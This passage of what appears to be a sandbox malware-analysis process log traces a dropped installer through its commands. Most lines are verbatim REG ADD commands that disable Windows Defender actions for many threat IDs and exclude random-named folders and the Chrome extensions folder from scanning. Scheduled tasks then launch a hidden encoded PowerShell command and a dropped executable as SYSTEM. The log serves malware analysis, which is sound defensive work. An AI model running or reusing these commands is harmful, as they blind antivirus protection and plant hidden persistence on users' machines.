Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5920
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2540
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3676
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gzOkhhjxW" /SC once /ST 00:32:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gzOkhhjxW"
  2⤵
  PID:4204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gzOkhhjxW"
  2⤵
  PID:4396
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 04:09:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\dzqjbCr.exe\" GH /QJoydidPL 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5024
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6016
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:5464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5744
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5704
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4108

C:\Users\Admin\AppData\Local\Temp\7zS148D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS148D.tmp\Install.exe it /pMfdidqaJR 385118 /S
1⤵
- Executes dropped EXE
PID:4360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5176
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5544
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5696
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5532
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5888
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6080
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6016
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5564
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5656
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:2920
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4648
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5504
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5540
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:1068
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1304
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5184
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 